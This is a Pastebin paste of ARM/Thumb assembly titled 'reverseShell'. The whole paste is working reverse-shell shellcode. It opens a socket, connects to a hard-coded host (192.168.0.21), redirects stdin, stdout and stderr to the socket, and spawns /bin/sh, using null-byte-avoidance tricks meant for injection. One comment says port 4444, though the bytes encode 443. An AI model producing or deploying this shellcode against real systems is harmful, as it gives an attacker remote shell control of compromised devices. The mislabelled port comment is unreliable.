Advertisement
etk34b

reverseShell

Feb 7th, 2019
2,239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ARM 1.27 KB | None | 0 0
  1. .section .text
  2. .global _start
  3. _start:
  4.  .ARM
  5.  add   r3, pc, #1       // switch to thumb mode
  6.  bx    r3
  7.  
  8. .THUMB
  9. // socket(2, 1, 0)
  10.  mov   r0, #2
  11.  mov   r1, #1
  12.  sub   r2, r2
  13.  mov   r7, #200
  14.  add   r7, #81         // r7 = 281 (socket)
  15.  svc   #1              // r0 = resultant sockfd
  16.  mov   r4, r0          // save sockfd in r4
  17.  
  18. // connect(r0, &sockaddr, 16)
  19.  adr   r1, struct        // pointer to address, port
  20.  strb  r2, [r1, #1]    // write 0 for AF_INET
  21.  mov   r2, #16
  22.  add   r7, #2          // r7 = 283 (connect)
  23.  svc   #1
  24.  
  25. // dup2(sockfd, 0)
  26.  mov   r7, #63         // r7 = 63 (dup2)
  27.  mov   r0, r4          // r4 is the saved sockfd
  28.  sub   r1, r1          // r1 = 0 (stdin)
  29.  svc   #1
  30. // dup2(sockfd, 1)
  31.  mov   r0, r4          // r4 is the saved sockfd
  32.  mov   r1, #1          // r1 = 1 (stdout)
  33.  svc   #1
  34. // dup2(sockfd, 2)
  35.  mov   r0, r4         // r4 is the saved sockfd
  36.  mov   r1, #2         // r1 = 2 (stderr)
  37.  svc   #1
  38.  
  39. // execve("/bin/sh", 0, 0)
  40.  adr   r0, binsh
  41.  sub   r2, r2
  42.  sub   r1, r1
  43.  strb  r2, [r0, #7]
  44.  mov   r7, #11       // r7 = 11 (execve)
  45.  svc   #1
  46.  
  47. struct:
  48. .ascii "\x02\xff"      // AF_INET 0xff will be NULLed
  49. .ascii "\x01\xbb"      // port number 4444
  50. .byte 192,168,0,21  // IP Address
  51. binsh:
  52. .ascii "/bin/shX"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement